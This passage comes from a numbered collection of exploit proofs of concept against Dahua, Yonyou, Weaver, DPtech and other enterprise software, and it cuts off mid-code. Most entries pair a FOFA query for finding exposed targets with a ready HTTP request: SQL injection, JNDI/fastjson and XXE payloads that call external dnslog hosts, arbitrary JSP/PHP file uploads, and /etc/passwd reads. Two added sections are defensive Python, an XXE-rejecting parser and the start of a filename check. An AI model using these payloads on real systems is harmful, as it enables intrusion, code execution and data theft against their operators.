User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The fname field supplies both the server-side path and the .jsp extension, so the .txt upload is written as a JSP under the web root.

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog/

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The filename field carries a relative path (./webapps/nc_web/1.jsp), so the certificate "import" writes a JSP under the web root.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

The XXE document travels as CDATA text inside the SOAP string parameter; the envelope itself contains no DOCTYPE, so a filter that inspects only the outer document misses it.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

The request shown only confirms the stacked-query injection by a 5 s delay; the RCE in the title refers to what stacked queries on SQL Server allow beyond that and is not demonstrated here.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

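Items 36, 37, 38, 40 and 45 above are the same bug in five endpoints: attacker-supplied XML reaches a parser that honours a DOCTYPE, so an internal SYSTEM entity pulls file:///C:/windows/win.ini into the response (36, 38) or an external entity or DTD reference makes the server resolve a dnslog hostname (37, 40, 45). The following is an added example, not code from the original article or from Yonyou: a pre-parse gate on Python's standard-library expat parser that refuses any DOCTYPE or external entity reference before a single identifier is resolved. The sample documents are the bodies of those items reproduced as constructed strings, plus a harmless RPC document shaped like item 38's. It also shows why the gate must be applied again to the inner string of item 37: the outer SOAP envelope is clean and parses fine, and the DOCTYPE only appears when the CDATA text is handed to a second parser.

```python
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when a document carries a DOCTYPE or an external entity reference."""


def parse_untrusted_xml(data) -> dict:
    """Parse XML from an untrusted source, refusing DTD features outright.

    Returns a flat {element_path: text} map so the caller can read values
    without ever touching a DTD. Raises UnsafeXml as soon as expat reports a
    DOCTYPE declaration, which happens before the internal subset is
    processed and therefore before any SYSTEM identifier could be fetched.
    """
    if isinstance(data, str):
        data = data.encode("utf-8")
    parser = xml.parsers.expat.ParserCreate()
    result = {}
    stack = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} not allowed (system id {sysid!r})")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: not reached once DOCTYPEs are refused, but an
        # exception here aborts the parse instead of resolving the entity.
        raise UnsafeXml(f"external entity reference to {system_id!r}")

    def on_start(name, attrs):
        stack.append(name)
        result.setdefault("/".join(stack), "")

    def on_end(name):
        stack.pop()

    def on_text(text):
        # CDATA content arrives here too, so item 37's payload is plain text.
        if stack:
            result["/".join(stack)] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return result


def is_rejected(doc) -> bool:
    """True when parse_untrusted_xml refuses the document as unsafe."""
    try:
        parse_untrusted_xml(doc)
    except UnsafeXml:
        return True
    return False


# Constructed samples: the XML bodies of items 36, 37, 40 and 45, and a
# benign RPC document of the shape item 38 abuses.
SAMPLES = {
    "item36_msg": (
        '<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]>'
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soap:Body><soap:Fault><faultcode>soap:Server&xxe1two;</faultcode>"
        "</soap:Fault></soap:Body></soap:Envelope>"
    ),
    "item37_envelope": (
        '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
        'xmlns:iup="http://update.oba.uap.nc/IUpdateService">'
        "<soapenv:Header/><soapenv:Body><iup:getResult><!--type: string-->"
        "<iup:string><![CDATA[\n"
        '<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>\n'
        "<xxx/>]]></iup:string></iup:getResult></soapenv:Body></soapenv:Envelope>"
    ),
    "item40": (
        '<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]>'
        "<r><a>&xxe;</a></r>"
    ),
    "item45_reqData": '<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">',
    "benign_rpc": '<rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">abc</p></vps></rpc>',
}

if __name__ == "__main__":
    for label, doc in SAMPLES.items():
        print(label, "REJECTED" if is_rejected(doc) else parse_untrusted_xml(doc))
    inner = parse_untrusted_xml(SAMPLES["item37_envelope"])[
        "soapenv:Envelope/soapenv:Body/iup:getResult/iup:string"]
    print("item37 inner string rejected:", is_rejected(inner))
```

The outer parse of item 37 succeeds and returns the CDATA text untouched; the application is only safe if whatever parses that string goes through the same gate. Rejecting DOCTYPE outright is the right default for machine-to-machine XML such as SOAP and RPC payloads, none of which need a DTD.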
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Both this request and item 49 send DontCheckLogin=1 in the query string, which is the unauthenticated path into these upload handlers.

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

%s is a template placeholder left unfilled in the published POC; the trailing space after .php is deliberate. Resulting file location as published:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech (迪普) VPN Service path traversal (arbitrary file read)
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

The source titles this entry "arbitrary file upload", but the only request it gives is the encoded ..%2F traversal above, which reads /etc/passwd.

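Items 24, 28, 35, 48 and 49 put a server-side path or a script extension into a multipart filename or companion field (\webapps\nc_web\x.jsp, ./webapps/nc_web/1.jsp, fileType=jsp, "x.php " with a trailing space), and items 47 and 53 read files through ../ and ..%2F in a download parameter. Both classes are one defect: a user-supplied string reaches the filesystem without being reduced to a bare name and confined to a directory. The following is an added example, not code from the original article or from any of the vendors: a confine() check for reads and a safe_upload_name() for writes, exercised on inputs copied from the requests above. The directory names are illustrative assumptions, not product paths.

```python
import posixpath
import re
import urllib.parse

# Illustrative directories for this example, not paths from any product.
UPLOAD_DIR = "/srv/app/uploads"
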